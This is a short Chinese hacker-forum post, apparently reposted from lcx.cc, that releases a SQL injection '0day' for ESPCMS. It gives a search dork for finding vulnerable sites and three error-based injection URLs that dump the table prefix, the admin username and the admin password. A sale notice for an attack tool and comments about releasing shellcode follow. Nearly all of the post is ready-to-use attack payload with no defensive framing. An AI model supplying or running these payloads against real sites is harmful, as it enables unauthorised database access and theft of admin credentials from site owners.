为证明我一直默默在T00LS..
发个小0day!!
百度关键字:inurl:index.php?ac=article&at=read&did=
注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
文章来源于lcx.cc:espcms 0day
相关推荐: 出售电磁风暴 v2.1、电磁风暴 v3.0 程序及源码
留言评论(旧系统): 【匿名者】 @ 2011-12-26 22:18:41 我记得核总以前说要放出那个shellcode增强版。。。。。。 本站回复: 卧槽,你记性真他妈的好,你不说我都忘了还有个这东西了,今天太晚了,明天或后天放出来吧。。。。 【匿名者】 …
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论